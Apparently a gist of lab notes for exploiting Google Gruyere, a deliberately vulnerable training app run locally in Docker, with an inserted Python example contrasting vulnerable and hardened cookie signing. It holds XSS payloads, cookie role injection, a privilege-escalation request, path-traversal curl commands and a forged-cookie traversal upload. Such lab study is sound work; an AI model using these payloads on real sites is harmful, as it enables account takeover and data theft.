@apolloclark
Last active October 20, 2016 23:46
Docker SSH

# run the Gruyere container
docker run -d -p 8008:8008 karthequian/gruyere

# list running containers
docker ps

# run Ash
docker exec -i -t <docker_id> /bin/ash

# run Ash, on first container instance
docker exec -it $(docker ps | awk 'FNR == 2 {print $1}') /bin/ash

# quit with "ctrl+pq"

XSS

/snippets.gtl?uid=test
/snippets.gtl?uid=+%3Cscript%3Ealert("XSSed!")%3C/script%3E

<script>document.write(0 + 1)</script>

XSS, File

[test.html]
<script>
alert(document.cookie);
</script>

/test/test.html

XSS, Snippet

You'll notice the <script> tag is replaced by <blocked/>

<a onmouseover="alert(1)" href="#">read this!</a>

Cookie manipulation

create a user with the name "foo|admin|author"
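Why the pipe-delimited username works, and one way a server can close the hole, as an added example (not Gruyere's own code): the cookie layout `hash|uid|is_admin|is_author` that the page uses is parsed by splitting on `|`, so a uid containing `|` shifts the role fields even though the server itself computed the hash over the body. The hardened variant is hypothetical, rejects `|` in usernames, HMACs a JSON payload, and uses a constructed demo secret.

```python
import hashlib
import hmac
import json
import re

# Constructed demo secret; a real deployment loads this from configuration.
SECRET = b"demo-secret-not-for-production"


def make_cookie_vulnerable(uid, is_admin=False, is_author=False):
    """Gruyere-style cookie: hash|uid|is_admin|is_author, hash over the body."""
    body = "%s|%s|%s" % (uid, "admin" if is_admin else "", "author" if is_author else "")
    digest = hashlib.sha1(SECRET + body.encode()).hexdigest()
    return digest + "|" + body


def parse_cookie_vulnerable(cookie):
    """Splits on '|'; a uid like 'foo|admin|author' lands in the role fields."""
    fields = cookie.split("|")
    return {"uid": fields[1],
            "is_admin": fields[2] == "admin",
            "is_author": fields[3] == "author"}


USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def username_allowed(uid):
    """Whitelist of username characters; the delimiter can never appear."""
    return USERNAME_RE.fullmatch(uid) is not None


def make_cookie_hardened(uid, is_admin=False, is_author=False):
    """HMAC over a JSON payload, so data cannot be confused with structure."""
    if not username_allowed(uid):
        raise ValueError("invalid username")
    payload = json.dumps({"uid": uid, "is_admin": bool(is_admin),
                          "is_author": bool(is_author)}, sort_keys=True)
    mac = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return mac + "." + payload  # hex MAC contains no '.', so split on the first one


def parse_cookie_hardened(cookie):
    """Verifies the MAC in constant time before trusting any field."""
    mac, payload = cookie.split(".", 1)
    expected = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        raise ValueError("bad cookie signature")
    data = json.loads(payload)
    return {"uid": data["uid"], "is_admin": data["is_admin"] is True,
            "is_author": data["is_author"] is True}
```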

Priv Escalation

Do a GET to: /saveprofile?action=update&is_admin=True

Info Disclosure

curl  http://127.0.0.1:8008/<instance_id>/../secret.txt
curl  http://127.0.0.1:8008/<instance_id>/..%2fsecret.txt
# this is crashing the Docker container...

Direct Object Reference

# delete another user's data
/deletesnippet?index=0

Remote file inclusion

[secret.txt]
I'm in ur filez

cd ~/Desktop

# the --cookie line needs a trailing backslash, otherwise the command ends there
curl \
  --cookie "<hash>|test|admin|author" \
  -F "upload_file=@secret.txt;filename='../secret.txt'" \
  http://127.0.0.1:8008/<instance_id>/upload2